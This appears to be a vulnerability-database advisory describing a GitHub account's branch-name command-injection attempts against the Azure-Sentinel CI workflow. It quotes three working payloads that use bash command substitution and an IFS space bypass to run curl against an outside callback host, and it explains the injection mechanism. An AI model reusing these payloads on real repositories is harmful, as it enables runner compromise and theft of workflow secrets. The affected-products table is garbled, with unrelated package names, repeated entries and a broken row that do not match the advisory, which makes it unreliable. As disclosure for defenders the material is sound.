VDB
GCVE-110-OSM-2026-596
GCVE-110-OSM-2026-596
Advisory PublishedCVSS 8.8/10
GitHub user account used to launch GitHub Actions branch-name command-injection attacks against Azure/Azure-Sentinel. On 2026-05-21 the account opened PRs #14319, #14320, and #14321 whose branch names contained working shell payloads using bash command substitution with IFS as a space-bypass, and immediately triggered the /package ChatOps workflow on each PR via comment. Branches and PRs were closed/deleted within minutes (evidence cleanup). Account is fresh (created 2025-08-22), empty profile, 0 followers, only forks of Microsoft/GitHub repos (codespaces, AL-Go-PTE, semantic-kernel, vscode-copilot-chat) which is a typical GHA-injection reconnaissance footprint across the Microsoft estate. The payload in PR #14320 referenced an MSRC case path (msrc-77210699778-xQ7vN2) which suggests possible bug-bounty research, but the public artifacts are weaponized PoCs against a Microsoft security product CI either way.
Malicious payload found in: PR head_ref (branch name) on Azure/Azure-Sentinel
=== PAYLOAD 1: PR #14319 ===
Branch (dollar/IFS chars escaped): a$(curl${IFS}ky28nlq70u99.dssldrf.net/helloworld)
Commit: 84352946096fa7e61764a0dcce1e98bafa25c5e7
Trigger: /package comment by wolf-dragoon @ 2026-05-21 15:36:33 UTC
=== PAYLOAD 2: PR #14320 ===
Branch: c$(curl${IFS}ky28nlq70u99.dssldrf.net/msrc-77210699778-xQ7vN2)
Commit: 49c7e683f18aa945f61514c95da96ca0974abaa5
Trigger: /package comment by wolf-dragoon @ 2026-05-21 15:55:58 UTC
Note: msrc-77210699778 path suggests MSRC bug-bounty submission tracking
=== PAYLOAD 3: PR #14321 ===
Branch: b$(curl${IFS}pkg-cmd-1.ky28nlq70u99.dssldrf.net)
Commit: d84920218a405209a1b92ec0e35d262b98d09597
Trigger: /package comment by wolf-dragoon @ 2026-05-21 16:01:13 UTC
C2/OAST host: ky28nlq70u99.dssldrf.net (apex: dssldrf.net)
Mechanism: If a workflow interpolates github.head_ref or pull_request.head.ref into a shell run: step (likely the handler for /package ChatOps trigger in pull_request_target context), the curl payload executes on a Microsoft-controlled runner with whatever secrets that workflow holds.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | nemo-fpti | * (affected), all (affected), all (affected), all (affected), * (affected), all (affected), all (affected), all (affected), * (affected) | — |
| unknown | express-session-validator | all (affected), all (affected), all (affected), all (affected) | — |
| unknown | * (affected), all (affected) | — | |
| unknown | agoda-test-poc | all (affected), all (affected) | — |
Browse GCVE Records
72,664 records in the GCVE database · Updated July 15, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.